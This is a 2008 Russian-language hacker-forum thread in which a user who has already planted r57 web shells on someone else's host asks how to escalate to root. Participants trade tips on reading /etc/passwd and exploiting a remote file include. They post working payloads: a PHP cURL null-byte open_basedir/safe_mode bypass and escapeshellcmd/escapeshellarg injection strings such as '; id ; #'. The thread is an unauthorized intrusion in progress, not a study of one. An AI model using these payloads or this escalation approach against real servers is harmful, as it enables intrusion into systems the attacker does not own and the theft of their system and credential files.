Как пробиться к корню?

Discussion in 'Песочница' started by 1west, 2 Oct 2008.

  1. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    попробуй какой нить нормльный шелл, типа р57, а то этот палёный какой то)
     
  2. 1west

    1west Elder - Старейшина

    Joined:
    8 Feb 2007
    Messages:
    30
    Likes Received:
    2
    Reputations:
    2
    залил r57.pl поставил права без результатно.
    ошибка 500.
    когда через r57.php ставлю чмод на файл он чмодит а сам шел обнуляется.
     
  3. nonamez

    nonamez Elder - Старейшина

    Joined:
    22 Jul 2007
    Messages:
    565
    Likes Received:
    265
    Reputations:
    17
    Позвони одмину,скажи что он выйграл и пускай расскажет что он та мнамудрил)))

    Так как если перловка не запускаецо,а она запускается только при 755(это макс для нее) то думаю ты так и останишься в первоночальной дире.
     
  4. 1west

    1west Elder - Старейшина

    Joined:
    8 Feb 2007
    Messages:
    30
    Likes Received:
    2
    Reputations:
    2

    уже звоню :)
    а может быть перла там нету.
    или запрещено этому пользователю перл скрипт выполнять.
     
  5. 1west

    1west Elder - Старейшина

    Joined:
    8 Feb 2007
    Messages:
    30
    Likes Received:
    2
    Reputations:
    2
    по ip нашел еще 1 сайт на томже хосте.
    на нем удоленый инклуд.
    allow_url_fopen : On
    все зделал как и на другом такаяже проблема ошибка 500.
    повидемому админ урезал права пользователям на перл.

    ошибка чтения /etc/passwd
    Warning: main() open_basedir restriction in effect. File(../../../../../etc/passwd) is not within the allowed path(s): (/var/www/ru:/usr/lib/php:/tmp)
     
  6. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Бывает проканывает этот способ. А бывает нет.
    Тут стоят ограничения по папкам. Дальше /var/www/ru не уйдёшь.
     
  7. 1west

    1west Elder - Старейшина

    Joined:
    8 Feb 2007
    Messages:
    30
    Likes Received:
    2
    Reputations:
    2

    почему я в паке /tmp тоже могу смотреть а вот в дугих уже нет.
    через сокет можно узнавать определеные файл есть или нету в /etc.
    только что это даст!
     
  8. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    в tmp пачти всегда можно зайти. Токо туда сможешь войти и всё.
     
  9. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    /etc/passwd
    и т.п можешь попробовать прочесть с шелла "* ernealizm *" через file id.

    правь сорцы для своих нужд.
     
  10. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    доступ к /tmp делают для того, чтобы php мог записывать сессии. Кстати доступ открыт не только для /tmp и папки веб, но и usr/lib/php (для доступа к PEAR и другим общим скриптам)

    версия php какая? возможно для твоей версии есть способ обхода ограничений
    google.com/?q=open_basedir+bypass
     
  11. 1west

    1west Elder - Старейшина

    Joined:
    8 Feb 2007
    Messages:
    30
    Likes Received:
    2
    Reputations:
    2

    в /usr/lib/php я зайти не могу.
    пишет незя а в ошибке показывает что можно.
    PHP Version 5.2.5-pl1-gentoo
    Apache 2.0 Handler
     
  12. 1west

    1west Elder - Старейшина

    Joined:
    8 Feb 2007
    Messages:
    30
    Likes Received:
    2
    Reputations:
    2
    где ево взять.
    есть сылка?
     
  13. 1west

    1west Elder - Старейшина

    Joined:
    8 Feb 2007
    Messages:
    30
    Likes Received:
    2
    Reputations:
    2
    вот нашел
    http://groups.google.pl/group/mailing.unix.bugtraq/browse_thread/thread/fad2925061ad312d
    PHP 5.2.5 cURL safe_mode bypass
    The first issue [SAFE_MODE bypass]
    var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__FILE__)));
    the last step in curl_init() function will only copy file://safe_mode_bypass to urlcopy.
    The main problem exists in php_url_parse_ex() function. If you put in curl_init() "file://host/somewhere/path.php", php_url_parse_ex() will select /somewhere/path.php to path varible. Looks good but it cannot be used, when you will check real path. Using file:///etc/passwd is correct but between file:// and /etc/passwd, php_url_parse_ex() will select host and return path to /passwd.

    как норм запрос составить
    делаю var_dump(curl_exec(curl_init("file://etc/passwd")));
    белая страница с надписью bool(false)
    как я понел файл должен скопироваться?
     
  14. mister

    mister Elder - Старейшина

    Joined:
    24 Jul 2007
    Messages:
    30
    Likes Received:
    16
    Reputations:
    4
    var_dump(curl_exec(curl_init("file://etc/passwd\x00".__FILE__)));
     
  15. 1west

    1west Elder - Старейшина

    Joined:
    8 Feb 2007
    Messages:
    30
    Likes Received:
    2
    Reputations:
    2
    если так
    var_dump(curl_exec(curl_init("file:///etc/passwd")));
    ответ
    Warning: curl_init() [function.curl-init]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/var/www/ru:/usr/lib/php:/tmp) in /var/www/ru/1.php on line 2
    Warning: curl_exec(): supplied argument is not a valid cURL handle resource in /var/www/ru/1.php on line 2
    bool(false)
     
  16. 1west

    1west Elder - Старейшина

    Joined:
    8 Feb 2007
    Messages:
    30
    Likes Received:
    2
    Reputations:
    2
    все что выводит
    bool(false)
    может заплатка какая стоит?
     
  17. 1west

    1west Elder - Старейшина

    Joined:
    8 Feb 2007
    Messages:
    30
    Likes Received:
    2
    Reputations:
    2
    вот по свежее выполнение команд
    http://securityvulns.ru/Tdocument809.html
    [1] escapeshellcmd()
    escapeshellcmd("echo ".chr(0xc0).";id");

    [2] escapeshellarg()
    $arg1 = chr(0xc0);
    $arg2 = "; id ; #";
    $cmd = "echo ".escapeshellarg($arg1)." ".escapeshellarg($arg2);

    после этого белая страница.
    вывода команды нету.
    ошибок тоже.